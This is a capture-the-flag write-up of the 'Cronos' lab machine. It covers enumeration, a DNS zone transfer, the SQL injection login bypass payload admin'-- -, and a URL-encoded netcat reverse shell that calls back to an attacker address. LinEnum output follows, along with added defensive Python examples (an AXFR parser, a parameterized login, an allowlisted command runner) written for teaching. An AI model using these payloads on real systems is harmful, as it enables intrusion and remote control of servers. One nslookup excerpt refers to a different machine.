Cronos Write-up

Pentest Report - Cronos

Enumeration

Port Scan

TCP

sudo nmap $1 -A -p- -sC -sV -Pn -oN nmap
Nmap scan report for 10.10.10.13
Host is up (0.044s latency).
Not shown: 65532 closed tcp ports (reset)
PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 7.2p2 Ubuntu 4ubuntu2.1 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   2048 18b973826f26c7788f1b3988d802cee8 (RSA)
|   256 1ae606a6050bbb4192b028bf7fe5963b (ECDSA)
|_  256 1a0ee7ba00cc020104cda3a93f5e2220 (ED25519)
53/tcp open  domain  ISC BIND 9.10.3-P4 (Ubuntu Linux)
| dns-nsid: 
|_  bind.version: 9.10.3-P4-Ubuntu
80/tcp open  http    Apache httpd 2.4.18 ((Ubuntu))
|_http-title: Apache2 Ubuntu Default Page: It works
|_http-server-header: Apache/2.4.18 (Ubuntu)

UDP

sudo nmap $1 -sU -A --top-ports 25 --min-rate 5000 -oN nmap_udp
Nmap scan report for 10.10.10.13
Host is up (0.042s latency).

PORT      STATE         SERVICE      VERSION
53/udp    open          domain       ISC BIND 9.10.3-P4 (Ubuntu Linux)
| dns-nsid: 
|_  bind.version: 9.10.3-P4-Ubuntu
67/udp    open|filtered dhcps
68/udp    open|filtered dhcpc
69/udp    closed        tftp
111/udp   open|filtered rpcbind
123/udp   closed        ntp
135/udp   open|filtered msrpc
137/udp   open|filtered netbios-ns
138/udp   open|filtered netbios-dgm
139/udp   open|filtered netbios-ssn
161/udp   open|filtered snmp
162/udp   open|filtered snmptrap
445/udp   open|filtered microsoft-ds
500/udp   open|filtered isakmp
514/udp   open|filtered syslog
520/udp   open|filtered route
631/udp   closed        ipp
998/udp   closed        puparp
1434/udp  open|filtered ms-sql-m
1701/udp  open|filtered L2TP
1900/udp  open|filtered upnp
4500/udp  open|filtered nat-t-ike
5353/udp  open|filtered zeroconf
49152/udp open|filtered unknown
49154/udp open|filtered unknown

Vulnerability Scan

sudo nmap $1 -p- --script vuln --min-rate 800 -Pn -oN nmap_vuln
Nmap scan report for cronos.htb (10.10.10.13)
Host is up (0.042s latency).
Not shown: 65532 closed tcp ports (reset)
PORT   STATE SERVICE
22/tcp open  ssh
53/tcp open  domain
80/tcp open  http
| http-enum: 
|   /robots.txt: Robots file
|   /css/: Potentially interesting directory w/ listing on 'apache/2.4.18 (ubuntu)'
|_  /js/: Potentially interesting directory w/ listing on 'apache/2.4.18 (ubuntu)'
|_http-stored-xss: Couldn't find any stored XSS vulnerabilities.
|_http-dombased-xss: Couldn't find any DOM based XSS.
|_http-csrf: Couldn't find any CSRF vulnerabilities.

DNS Enumeration

Query Domain Name

nslookup                    
> server <IP>
Default server: 10.10.11.166
Address: 10.10.11.166#53
> <IP>
;; communications error to 10.10.11.166#53: timed out
166.11.10.10.in-addr.arpa       name = trick.htb
> 

Get DNS Records

nslookup -type=ANY site.site.com 0.0.0.0
nslookup -type=any cronos.htb 10.10.10.13   
Server:         10.10.10.13
Address:        10.10.10.13#53

cronos.htb
        origin = cronos.htb
        mail addr = admin.cronos.htb
        serial = 3
        refresh = 604800
        retry = 86400
        expire = 2419200
        minimum = 604800
cronos.htb      nameserver = ns1.cronos.htb.
Name:   cronos.htb
Address: 10.10.10.13

Zone Transfer

dig axfr @10.10.10.13 cronos.htb   

; <<>> DiG 9.18.12-1-Debian <<>> axfr @10.10.10.13 cronos.htb
; (1 server found)
;; global options: +cmd
cronos.htb.             604800  IN      SOA     cronos.htb. admin.cronos.htb. 3 604800 86400 2419200 604800
cronos.htb.             604800  IN      NS      ns1.cronos.htb.
cronos.htb.             604800  IN      A       10.10.10.13
admin.cronos.htb.       604800  IN      A       10.10.10.13
ns1.cronos.htb.         604800  IN      A       10.10.10.13
www.cronos.htb.         604800  IN      A       10.10.10.13
cronos.htb.             604800  IN      SOA     cronos.htb. admin.cronos.htb. 3 604800 86400 2419200 604800
;; Query time: 40 msec
;; SERVER: 10.10.10.13#53(10.10.10.13) (TCP)
;; WHEN: Sat May 06 09:52:03 CEST 2023
;; XFR size: 7 records (messages 1, bytes 203)
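The transfer above succeeding is itself the finding: BIND answered an AXFR from an arbitrary client, and the records it handed back name the admin, ns1 and www hosts that show up as virtual hosts in the HTTP section. The following is an added example, not part of the original write-up, that parses dig's AXFR output, checks that the transfer was complete (SOA at both ends), and lists the subdomains it exposed. The sample transcript is the output above; the function names are my own.

```python
"""Parse dig AXFR output and report what a successful zone transfer exposed.

Added example, not part of the original write-up. SAMPLE_AXFR is the dig
output shown above; parse_axfr / transfer_succeeded / vhost_candidates are
hypothetical helper names.
"""
import re
from collections import defaultdict

# Constructed sample: the dig axfr transcript from the write-up, comments included.
SAMPLE_AXFR = """\
; <<>> DiG 9.18.12-1-Debian <<>> axfr @10.10.10.13 cronos.htb
; (1 server found)
;; global options: +cmd
cronos.htb.             604800  IN      SOA     cronos.htb. admin.cronos.htb. 3 604800 86400 2419200 604800
cronos.htb.             604800  IN      NS      ns1.cronos.htb.
cronos.htb.             604800  IN      A       10.10.10.13
admin.cronos.htb.       604800  IN      A       10.10.10.13
ns1.cronos.htb.         604800  IN      A       10.10.10.13
www.cronos.htb.         604800  IN      A       10.10.10.13
cronos.htb.             604800  IN      SOA     cronos.htb. admin.cronos.htb. 3 604800 86400 2419200 604800
;; Query time: 40 msec
;; SERVER: 10.10.10.13#53(10.10.10.13) (TCP)
"""

# One resource record per line: NAME TTL IN TYPE RDATA
RR_LINE = re.compile(r"^(\S+)\s+(\d+)\s+IN\s+([A-Z]+)\s+(.*)$")


def parse_axfr(text):
    """Return (name, ttl, type, rdata) tuples, skipping dig's ';' comment lines."""
    records = []
    for line in text.splitlines():
        line = line.strip()
        if not line or line.startswith(";"):
            continue
        m = RR_LINE.match(line)
        if m:
            name, ttl, rtype, rdata = m.groups()
            records.append((name.rstrip("."), int(ttl), rtype, rdata.strip()))
    return records


def transfer_succeeded(records):
    """A complete AXFR is framed by the zone's SOA record at start and end."""
    return len(records) >= 2 and records[0][2] == "SOA" and records[-1][2] == "SOA"


def hostnames_by_address(records):
    """Map each A/AAAA address to the names pointing at it (vhost candidates per IP)."""
    hosts = defaultdict(list)
    for name, _ttl, rtype, rdata in records:
        if rtype in ("A", "AAAA"):
            hosts[rdata].append(name)
    return dict(hosts)


def vhost_candidates(records, zone):
    """Every named host other than the zone apex, i.e. what the transfer leaked."""
    return sorted({name for name, _, rtype, _ in records
                   if rtype in ("A", "AAAA") and name != zone})


if __name__ == "__main__":
    recs = parse_axfr(SAMPLE_AXFR)
    print("zone transfer allowed:", transfer_succeeded(recs))
    print("subdomains exposed:", vhost_candidates(recs, "cronos.htb"))
    print("names per address:", hostnames_by_address(recs))
```

On the server side the fix is to restrict `allow-transfer` in named.conf to the secondary name servers (or `none` when there are none), so a full zone dump like this is not available to arbitrary clients.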

HTTP

Directory Brute Forcing

dirsearch -u http://{IP}/ -r --deep-recursive -F -t 100 -x 404,403,400,500
Target: http://cronos.htb:80/

[09:54:22] Starting: 
[09:54:27] 200 -  924B  - /js                                               
[09:54:33] 200 -  925B  - /css                                              
[09:54:34] 200 -    0B  - /favicon.ico                                      
[09:54:35] 200 -    2KB - /index.php                                        
[09:54:36] 200 -  924B  - /js/     (Added to queue)                         
[09:54:41] 200 -   24B  - /robots.txt                                       
[09:54:44] 200 -  914B  - /web.config                                       
[09:54:45] Starting: js/                                                     
[09:54:53] 200 -  278KB - /js/app.js                                        

Target: http://ns1.cronos.htb:80/

[09:54:30] Starting: 
[09:54:43] 200 -   11KB - /index.html

Target: http://admin.cronos.htb:80/

[09:54:53] Starting: 
[09:55:02] 200 -    0B  - /config.php                                       
[09:55:05] 200 -    2KB - /index.php                                        
[09:55:05] 200 -    2KB - /index.php/login/

Target: http://www.cronos.htb:80/

[09:55:33] Starting: 
[09:55:34] 200 -  928B  - /js                                              
[09:55:42] 200 -  929B  - /css                                              
[09:55:43] 200 -    0B  - /favicon.ico                                      
[09:55:44] 200 -    2KB - /index.php                                        
[09:55:45] 200 -  928B  - /js/     (Added to queue)                         
[09:55:48] 200 -   24B  - /robots.txt                                       
[09:55:51] 200 -  914B  - /web.config

Subdomain Enumeration

gobuster vhost -u http://cronos.htb -t 100 -w /usr/share/seclists/Discovery/DNS/subdomains-top1million-20000.txt --append-domain -q -k --no-error 
Found: admin.cronos.htb Status: 200 [Size: 1547]

Spider/Crawling

gospider -s http://0.0.0.0 -t 50 -d 2 -o .

Fingerprint

Apache httpd 2.4.18 | PHP

Exploitation

Authentication Bypass - Login Page

By injecting SQL into the login form at admin.cronos.htb, we bypass authentication and gain access to /welcome.php.

Payload: admin'-- -
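Why that payload works, shown as an added example rather than the site's own PHP: a login that concatenates the username into the query text turns `admin'-- -` into `... WHERE username='admin'-- -' AND password='...'`, and the comment swallows the password check. The same input against a query with bound parameters matches nothing. The table, the user row and both login functions are constructed here, with sqlite3 standing in for the application's database.

```python
"""Vulnerable string-built login beside a parameterized one.

Added example, not the Cronos application's code. Table, user row and
function names are constructed; sqlite3 stands in for the real database.
"""
import hashlib
import sqlite3


def make_db():
    """In-memory users table with one constructed account."""
    db = sqlite3.connect(":memory:")
    db.execute("CREATE TABLE users (username TEXT, password TEXT)")
    # sha256 keeps the example to the standard library; a real app would use a
    # password hash such as bcrypt or argon2.
    db.execute("INSERT INTO users VALUES (?, ?)",
               ("admin", hashlib.sha256(b"constructed-secret").hexdigest()))
    return db


def login_vulnerable(db, username, password):
    """String concatenation: the username becomes part of the SQL text.

    With username = "admin'-- -" the query reads
      SELECT username FROM users WHERE username='admin'-- -' AND password='...'
    and everything after '--' is a comment, so the password is never checked.
    """
    pw_hash = hashlib.sha256(password.encode()).hexdigest()
    query = ("SELECT username FROM users WHERE username='" + username
             + "' AND password='" + pw_hash + "'")
    return db.execute(query).fetchone() is not None


def login_parameterized(db, username, password):
    """Bound parameters: the query shape is fixed, the input is only ever data."""
    pw_hash = hashlib.sha256(password.encode()).hexdigest()
    row = db.execute(
        "SELECT username FROM users WHERE username=? AND password=?",
        (username, pw_hash),
    ).fetchone()
    return row is not None


if __name__ == "__main__":
    db = make_db()
    print("vulnerable, bypass payload:", login_vulnerable(db, "admin'-- -", "wrong"))
    print("parameterized, bypass payload:", login_parameterized(db, "admin'-- -", "wrong"))
    print("parameterized, real password:", login_parameterized(db, "admin", "constructed-secret"))
```

The trailing `-` in `-- -` matters for MySQL, which only treats `--` as a comment when whitespace follows it; the extra character stops that space from being trimmed away. The parameterized version is indifferent to all of this because the driver never splices the input into the statement.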

RCE - Insufficient Input Sanitization

If we intercept the POST request that welcome.php sends, we can change the command parameter to anything we like and the server executes it.

![[Pasted image 20230506101023.png]]

Injecting a URL-encoded reverse shell payload into the command field gives us a reverse shell:

command=rm+/tmp/f%3bmkfifo+/tmp/f%3bcat+/tmp/f|/bin/bash+-i+2>%261|nc+10.10.14.13+445+>/tmp/f
nc -nlvp 445                             
listening on [any] 445 ...
connect to [10.10.14.13] from (UNKNOWN) [10.10.10.13] 53720
bash: cannot set terminal process group (1321): Inappropriate ioctl for device
bash: no job control in this shell
www-data@cronos:/var/www/admin$
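The root cause here is that a request parameter reaches a shell unchanged. The following added example, not the Cronos code, contrasts that pattern with one that exposes a fixed allowlist of tools, validates the host argument, and starts the program from an argv list without any shell. It assumes (hypothetically) that the page is meant to run a network diagnostic against a user-supplied host; the tool names, the host check and the sample inputs are constructed for the example.

```python
"""Unsanitized command execution beside an allowlisted, argv-based version.

Added example, not the Cronos welcome.php code. ALLOWED_TOOLS, validate_host
and build_argv are hypothetical names chosen for this example.
"""
import ipaddress
import re
import subprocess

# Vulnerable pattern: the request parameter is handed to a shell unchanged, so
# ';', '|', '$(...)' and friends turn a diagnostics form into command execution.
def run_vulnerable(command):
    completed = subprocess.run(command, shell=True, capture_output=True,
                               text=True, timeout=10)
    return completed.stdout


# Hardened pattern: the client picks a tool by name, the host is validated, and
# the program is started from an argv list so no shell ever parses the input.
ALLOWED_TOOLS = {
    "ping": ["ping", "-c", "1"],
    "traceroute": ["traceroute", "-m", "5"],
}

# RFC 1123 style hostname: labels of letters, digits and hyphens, 253 chars max.
HOSTNAME_RE = re.compile(
    r"^(?=.{1,253}$)[A-Za-z0-9](?:[A-Za-z0-9-]{0,61}[A-Za-z0-9])?"
    r"(?:\.[A-Za-z0-9](?:[A-Za-z0-9-]{0,61}[A-Za-z0-9])?)*$"
)


def validate_host(host):
    """Accept an IP literal or a plain hostname; reject everything else."""
    try:
        ipaddress.ip_address(host)
        return host
    except ValueError:
        pass
    if HOSTNAME_RE.match(host):
        return host
    raise ValueError(f"invalid host: {host!r}")


def build_argv(tool, host):
    """Resolve the tool against the allowlist and append the validated host."""
    if tool not in ALLOWED_TOOLS:
        raise ValueError(f"tool not allowed: {tool!r}")
    return ALLOWED_TOOLS[tool] + [validate_host(host)]


def run_hardened(tool, host):
    argv = build_argv(tool, host)          # raises ValueError on bad input
    completed = subprocess.run(argv, capture_output=True, text=True, timeout=30)
    return completed.stdout


if __name__ == "__main__":
    # Benign demonstration of the vulnerable path: a second command rides along.
    print(run_vulnerable("echo hello; echo injected"))
    print(build_argv("ping", "10.10.10.13"))
    for bad in ("10.10.10.13; id", "$(id)", "www.cronos.htb|nc"):
        try:
            build_argv("ping", bad)
        except ValueError as err:
            print("rejected:", err)
```

Two properties do the work: the allowlist means the server, not the client, decides which binary runs, and the argv list means characters such as `;` or `|` are passed to that binary as literal text rather than interpreted by `/bin/sh`. The host validator is still worth keeping, since some tools treat leading `-` as an option.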

Privilege Escalation

Full Linux Shell

python -c 'import pty;pty.spawn("/bin/bash")'
# script /dev/null -c bash 

target@target:~/.ssh$ ^Z
zsh: suspended  nc -nlvp 1234

stty raw -echo; fg
[1]  + continued  nc -nlvp 1234

target@target:~/.ssh$ export TERM=xterm

Enumeration

Linenum Output

www-data@cronos:/tmp$ ./linenum.sh
./linenum.sh

### SYSTEM ##############################################                                    
[-] Kernel information:                                                                      
Linux cronos 4.4.0-72-generic #93-Ubuntu SMP Fri Mar 31 14:07:41 UTC 2017 x86_64 x86_64 x86_64 GNU/Linux                                                                                  

[-] Kernel information (continued):                                                          
Linux version 4.4.0-72-generic (buildd@lcy01-17) (gcc version 5.4.0 20160609 (Ubuntu 5.4.0-6ubuntu1~16.04.4) ) #93-Ubuntu SMP Fri Mar 31 14:07:41 UTC 2017                                

[-] Specific release information:                                                            
DISTRIB_ID=Ubuntu
DISTRIB_RELEASE=16.04
DISTRIB_CODENAME=xenial
DISTRIB_DESCRIPTION="Ubuntu 16.04.2 LTS"
NAME="Ubuntu"
VERSION="16.04.2 LTS (Xenial Xerus)"
ID=ubuntu
ID_LIKE=debian
PRETTY_NAME="Ubuntu 16.04.2 LTS"
VERSION_ID="16.04"
HOME_URL="http://www.ubuntu.com/"
SUPPORT_URL="http://help.ubuntu.com/"
BUG_REPORT_URL="http://bugs.launchpad.net/ubuntu/"
VERSION_CODENAME=xenial
UBUNTU_CODENAME=xenial

[-] Hostname:
cronos

### USER/GROUP ##########################################
[-] Current user/group info:
uid=33(www-data) gid=33(www-data) groups=33(www-data)

[-] Users that have previously logged onto the system:
Username         Port     From             Latest
root             tty1                      Fri Jun 17 13:33:44 +0300 2022
noulis           pts/0    10.10.14.141     Thu Jul 27 01:39:12 +0300 2017

[-] Who else is logged on:
 11:14:21 up 26 min,  0 users,  load average: 0.00, 0.08, 0.27
USER     TTY      FROM             LOGIN@   IDLE   JCPU   PCPU WHAT

[-] Group memberships:
uid=0(root) gid=0(root) groups=0(root)
uid=1(daemon) gid=1(daemon) groups=1(daemon)
uid=2(bin) gid=2(bin) groups=2(bin)
uid=3(sys) gid=3(sys) groups=3(sys)
uid=4(sync) gid=65534(nogroup) groups=65534(nogroup)
uid=5(games) gid=60(games) groups=60(games)
uid=6(man) gid=12(man) groups=12(man)
uid=7(lp) gid=7(lp) groups=7(lp)
uid=8(mail) gid=8(mail) groups=8(mail)
uid=9(news) gid=9(news) groups=9(news)
uid=10(uucp) gid=10(uucp) groups=10(uucp)
uid=13(proxy) gid=13(proxy) groups=13(proxy)
uid=33(www-data) gid=33(www-data) groups=33(www-data)
uid=34(backup) gid=34(backup) groups=34(backup)
uid=38(list) gid=38(list) groups=38(list)
uid=39(irc) gid=39(irc) groups=39(irc)
uid=41(gnats) gid=41(gnats) groups=41(gnats)
uid=65534(nobody) gid=65534(nogroup) groups=65534(nogroup)
uid=100(systemd-timesync) gid=102(systemd-timesync) groups=102(systemd-timesync)
uid=101(systemd-network) gid=103(systemd-network) groups=103(systemd-network)
uid=102(systemd-resolve) gid=104(systemd-resolve) groups=104(systemd-resolve)
uid=103(systemd-bus-proxy) gid=105(systemd-bus-proxy) groups=105(systemd-bus-proxy)
uid=104(syslog) gid=108(syslog) groups=108(syslog),4(adm)
uid=105(_apt) gid=65534(nogroup) groups=65534(nogroup)
uid=106(lxd) gid=65534(nogroup) groups=65534(nogroup)
uid=107(mysql) gid=111(mysql) groups=111(mysql)
uid=108(messagebus) gid=112(messagebus) groups=112(messagebus)
uid=109(uuidd) gid=113(uuidd) groups=113(uuidd)
uid=110(dnsmasq) gid=65534(nogroup) groups=65534(nogroup)
uid=111(sshd) gid=65534(nogroup) groups=65534(nogroup)
uid=1000(noulis) gid=1000(noulis) groups=1000(noulis),4(adm),24(cdrom),27(sudo),30(dip),46(plugdev),110(lxd),117(lpadmin),118(sambashare)
uid=112(bind) gid=119(bind) groups=119(bind)

[-] It looks like we have some admin users:
uid=104(syslog) gid=108(syslog) groups=108(syslog),4(adm)
uid=1000(noulis) gid=1000(noulis) groups=1000(noulis),4(adm),24(cdrom),27(sudo),30(dip),46(plugdev),110(lxd),117(lpadmin),118(sambashare)

[-] Contents of /etc/passwd:
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
bin:x:2:2:bin:/bin:/usr/sbin/nologin
sys:x:3:3:sys:/dev:/usr/sbin/nologin
sync:x:4:65534:sync:/bin:/bin/sync
games:x:5:60:games:/usr/games:/usr/sbin/nologin
man:x:6:12:man:/var/cache/man:/usr/sbin/nologin
lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin
mail:x:8:8:mail:/var/mail:/usr/sbin/nologin
news:x:9:9:news:/var/spool/news:/usr/sbin/nologin
uucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin
proxy:x:13:13:proxy:/bin:/usr/sbin/nologin
www-data:x:33:33:www-data:/var/www:/bin/bash
backup:x:34:34:backup:/var/backups:/usr/sbin/nologin
list:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin
irc:x:39:39:ircd:/var/run/ircd:/usr/sbin/nologin
gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/usr/sbin/nologin
nobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin
systemd-timesync:x:100:102:systemd Time Synchronization,,,:/run/systemd:/bin/false
systemd-network:x:101:103:systemd Network Management,,,:/run/systemd/netif:/bin/false
systemd-resolve:x:102:104:systemd Resolver,,,:/run/systemd/resolve:/bin/false
systemd-bus-proxy:x:103:105:systemd Bus Proxy,,,:/run/systemd:/bin/false
syslog:x:104:108::/home/syslog:/bin/false
_apt:x:105:65534::/nonexistent:/bin/false
lxd:x:106:65534::/var/lib/lxd/:/bin/false
mysql:x:107:111:MySQL Server,,,:/nonexistent:/bin/false
messagebus:x:108:112::/var/run/dbus:/bin/false
uuidd:x:109:113::/run/uuidd:/bin/false
dnsmasq:x:110:65534:dnsmasq,,,:/var/lib/misc:/bin/false
sshd:x:111:65534::/var/run/sshd:/usr/sbin/nologin
noulis:x:1000:1000:Noulis Panoulis,,,:/home/noulis:/bin/bash
bind:x:112:119::/var/cache/bind:/bin/false

[-] Super user account(s):
root

[-] Are permissions on /home directories lax:
total 12K
drwxr-xr-x  3 root   root   4.0K May 10  2022 .
drwxr-xr-x 23 root   root   4.0K May 10  2022 ..
drwxr-xr-x  4 noulis noulis 4.0K May 10  2022 noulis

### ENVIRONMENTAL #######################################
[-] Environment information:
APACHE_PID_FILE=/var/run/apache2/apache2.pid
APACHE_RUN_USER=www-data
PATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin
APACHE_LOG_DIR=/var/log/apache2
PWD=/tmp
LANG=C
APACHE_RUN_GROUP=www-data
SHLVL=2
APACHE_RUN_DIR=/var/run/apache2
APACHE_LOCK_DIR=/var/lock/apache2
_=/usr/bin/env

[-] Path information:
/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin
drwxr-xr-x 2 root root  4096 May 10  2022 /bin
drwxr-xr-x 2 root root 12288 May 10  2022 /sbin
drwxr-xr-x 2 root root 20480 May 10  2022 /usr/bin
drwxr-xr-x 2 root root  4096 May 10  2022 /usr/local/bin
drwxr-xr-x 2 root root  4096 May 10  2022 /usr/local/sbin
drwxr-xr-x 2 root root 12288 May 10  2022 /usr/sbin

[-] Available shells:
# /etc/shells: valid login shells
/bin/sh
/bin/dash
/bin/bash
/bin/rbash
/usr/bin/tmux
/usr/bin/screen

[-] Current umask value:
0022
u=rwx,g=rx,o=rx

[-] umask value as specified in /etc/login.defs:
UMASK           022

[-] Password and storage information:
PASS_MAX_DAYS   99999
PASS_MIN_DAYS   0
PASS_WARN_AGE   7
ENCRYPT_METHOD SHA512

### JOBS/TASKS ##########################################
[-] Cron jobs:
-rw-r--r-- 1 root root  797 Apr  9  2017 /etc/crontab

/etc/cron.d:
total 24
drwxr-xr-x  2 root root 4096 May 10  2022 .
drwxr-xr-x 95 root root 4096 May 10  2022 ..
-rw-r--r--  1 root root  102 Apr  6  2016 .placeholder
-rw-r--r--  1 root root  589 Jul 16  2014 mdadm
-rw-r--r--  1 root root  670 Mar  1  2016 php
-rw-r--r--  1 root root  191 Mar 22  2017 popularity-contest

/etc/cron.daily:
total 60
drwxr-xr-x  2 root root 4096 May 10  2022 .
drwxr-xr-x 95 root root 4096 May 10  2022 ..
-rw-r--r--  1 root root  102 Apr  6  2016 .placeholder
-rwxr-xr-x  1 root root  539 Apr  6  2016 apache2
-rwxr-xr-x  1 root root  376 Mar 31  2016 apport
-rwxr-xr-x  1 root root 1474 Jan 17  2017 apt-compat
-rwxr-xr-x  1 root root  355 May 22  2012 bsdmainutils
-rwxr-xr-x  1 root root 1597 Nov 27  2015 dpkg
-rwxr-xr-x  1 root root  372 May  6  2015 logrotate
-rwxr-xr-x  1 root root 1293 Nov  6  2015 man-db
-rwxr-xr-x  1 root root  539 Jul 16  2014 mdadm
-rwxr-xr-x  1 root root  435 Nov 18  2014 mlocate
-rwxr-xr-x  1 root root  249 Nov 13  2015 passwd
-rwxr-xr-x  1 root root 3449 Feb 26  2016 popularity-contest
-rwxr-xr-x  1 root root  214 May 24  2016 update-notifier-common

/etc/cron.hourly:
total 12
drwxr-xr-x  2 root root 4096 May 10  2022 .
drwxr-xr-x 95 root root 4096 May 10  2022 ..
-rw-r--r--  1 root root  102 Apr  6  2016 .placeholder

/etc/cron.monthly:
total 12
drwxr-xr-x  2 root root 4096 May 10  2022 .
drwxr-xr-x 95 root root 4096 May 10  2022 ..
-rw-r--r--  1 root root  102 Apr  6  2016 .placeholder

/etc/cron.weekly:
total 24
drwxr-xr-x  2 root root 4096 May 10  2022 .
drwxr-xr-x 95 root root 4096 May 10  2022 ..
-rw-r--r--  1 root root  102 Apr  6  2016 .placeholder
-rwxr-xr-x  1 root root   86 Apr 13  2016 fstrim
-rwxr-xr-x  1 root root  771 Nov  6  2015 man-db
-rwxr-xr-x  1 root root  211 May 24  2016 update-notifier-common

[-] Crontab contents:
# /etc/crontab: system-wide crontab
# Unlike any other crontab you don't have to run the `crontab'
# command to install the new version when you edit this file
# and files in /etc/cron.d. These files also have username fields,
# that none of the other crontabs do.

SHELL=/bin/sh
PATH=/usr/local/sbin:/usr/local/bin:/sbin:/bin:/usr/sbin:/usr/bin

# m h dom mon dow user  command
17 *    * * *   root    cd / && run-parts --report /etc/cron.hourly
25 6    * * *   root    test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.daily )
47 6    * * 7   root    test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.weekly )
52 6    1 * *   root    test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.monthly )
* * * * *       root    php /var/www/laravel/artisan schedule:run >> /dev/null 2>&1
#

[-] Systemd timers:
NEXT                          LEFT       LAST                          PASSED    UNIT                         ACTIVATES
Sat 2023-05-06 12:00:10 EEST  45min left Sat 2023-05-06 10:48:09 EEST  26min ago snapd.refresh.timer          snapd.refresh.service
Sat 2023-05-06 22:59:17 EEST  11h left   Sat 2023-05-06 10:48:09 EEST  26min ago apt-daily.timer              apt-daily.service
Sun 2023-05-07 11:03:20 EEST  23h left   Sat 2023-05-06 11:03:20 EEST  11min ago systemd-tmpfiles-clean.timer systemd-tmpfiles-clean.service

3 timers listed.
Enable thorough tests to see inactive timers

### NETWORKING  ##########################################
[-] Network and IP info:
ens160    Link encap:Ethernet  HWaddr 00:50:56:b9:85:18  
          inet addr:10.10.10.13  Bcast:10.10.10.255  Mask:255.255.255.0
          inet6 addr: dead:beef::250:56ff:feb9:8518/64 Scope:Global
          inet6 addr: fe80::250:56ff:feb9:8518/64 Scope:Link
          UP BROADCAST RUNNING MULTICAST  MTU:1500  Metric:1
          RX packets:449972 errors:0 dropped:0 overruns:0 frame:0
          TX packets:360429 errors:0 dropped:0 overruns:0 carrier:0
          collisions:0 txqueuelen:1000 
          RX bytes:51524923 (51.5 MB)  TX bytes:142920379 (142.9 MB)

lo        Link encap:Local Loopback  
          inet addr:127.0.0.1  Mask:255.0.0.0
          inet6 addr: ::1/128 Scope:Host
          UP LOOPBACK RUNNING  MTU:65536  Metric:1
          RX packets:2331 errors:0 dropped:0 overruns:0 frame:0
          TX packets:2331 errors:0 dropped:0 overruns:0 carrier:0
          collisions:0 txqueuelen:1 
          RX bytes:226377 (226.3 KB)  TX bytes:226377 (226.3 KB)

[-] ARP history:
? (10.10.10.2) at 00:50:56:b9:9d:31 [ether] on ens160

[-] Nameserver(s):
nameserver 10.10.10.2
nameserver 8.8.8.8

[-] Default route:
default         10.10.10.2      0.0.0.0         UG    0      0        0 ens160

[-] Listening TCP:
Active Internet connections (only servers)
Proto Recv-Q Send-Q Local Address           Foreign Address         State       PID/Program name
tcp        0      0 127.0.0.1:3306          0.0.0.0:*               LISTEN      -               
tcp        0      0 10.10.10.13:53          0.0.0.0:*               LISTEN      -               
tcp        0      0 127.0.0.1:53            0.0.0.0:*               LISTEN      -               
tcp        0      0 0.0.0.0:22              0.0.0.0:*               LISTEN      -               
tcp        0      0 127.0.0.1:953           0.0.0.0:*               LISTEN      -               
tcp6       0      0 :::80                   :::*                    LISTEN      -               
tcp6       0      0 :::22                   :::*                    LISTEN      -               

[-] Listening UDP:
Active Internet connections (only servers)
Proto Recv-Q Send-Q Local Address           Foreign Address         State       PID/Program name
udp        0      0 10.10.10.13:53          0.0.0.0:*                           -               
udp        0      0 127.0.0.1:53            0.0.0.0:*                           -               

### SERVICES #############################################
[-] Running processes:
USER       PID %CPU %MEM    VSZ   RSS TTY      STAT START   TIME COMMAND
root         1  0.1  0.5  37936  6032 ?        Ss   10:48   0:01 /sbin/init
root         2  0.0  0.0      0     0 ?        S    10:48   0:00 [kthreadd]
root         3  0.0  0.0      0     0 ?        S    10:48   0:00 [ksoftirqd/0]
root         5  0.0  0.0      0     0 ?        S<   10:48   0:00 [kworker/0:0H]
root         7  0.0  0.0      0     0 ?        S    10:48   0:00 [rcu_sched]
root         8  0.0  0.0      0     0 ?        S    10:48   0:00 [rcu_bh]
root         9  0.0  0.0      0     0 ?        S    10:48   0:00 [migration/0]
root        10  0.0  0.0      0     0 ?        S    10:48   0:00 [watchdog/0]
root        11  0.0  0.0      0     0 ?        S    10:48   0:00 [kdevtmpfs]
root        12  0.0  0.0      0     0 ?        S<   10:48   0:00 [netns]
root        13  0.0  0.0      0     0 ?        S<   10:48   0:00 [perf]
root        14  0.0  0.0      0     0 ?        S    10:48   0:00 [khungtaskd]
root        15  0.0  0.0      0     0 ?        S<   10:48   0:00 [writeback]
root        16  0.0  0.0      0     0 ?        SN   10:48   0:00 [ksmd]
root        17  0.0  0.0      0     0 ?        SN   10:48   0:00 [khugepaged]
root        18  0.0  0.0      0     0 ?        S<   10:48   0:00 [crypto]
root        19  0.0  0.0      0     0 ?        S<   10:48   0:00 [kintegrityd]
root        20  0.0  0.0      0     0 ?        S<   10:48   0:00 [bioset]
root        21  0.0  0.0      0     0 ?        S<   10:48   0:00 [kblockd]
root        22  0.0  0.0      0     0 ?        S<   10:48   0:00 [ata_sff]
root        23  0.0  0.0      0     0 ?        S<   10:48   0:00 [md]
root        24  0.0  0.0      0     0 ?        S<   10:48   0:00 [devfreq_wq]
root        28  0.0  0.0      0     0 ?        S    10:48   0:00 [kswapd0]
root        29  0.0  0.0      0     0 ?        S<   10:48   0:00 [vmstat]
root        30  0.0  0.0      0     0 ?        S    10:48   0:00 [fsnotify_mark]
root        31  0.0  0.0      0     0 ?        S    10:48   0:00 [ecryptfs-kthrea]
root        47  0.0  0.0      0     0 ?        S<   10:48   0:00 [kthrotld]
root        48  0.0  0.0      0     0 ?        S<   10:48   0:00 [acpi_thermal_pm]
root        49  0.0  0.0      0     0 ?        S<   10:48   0:00 [bioset]
root        50  0.0  0.0      0     0 ?        S<   10:48   0:00 [bioset]
root        51  0.0  0.0      0     0 ?        S<   10:48   0:00 [bioset]
root        52  0.0  0.0      0     0 ?        S<   10:48   0:00 [bioset]
root        53  0.0  0.0      0     0 ?        S<   10:48   0:00 [bioset]
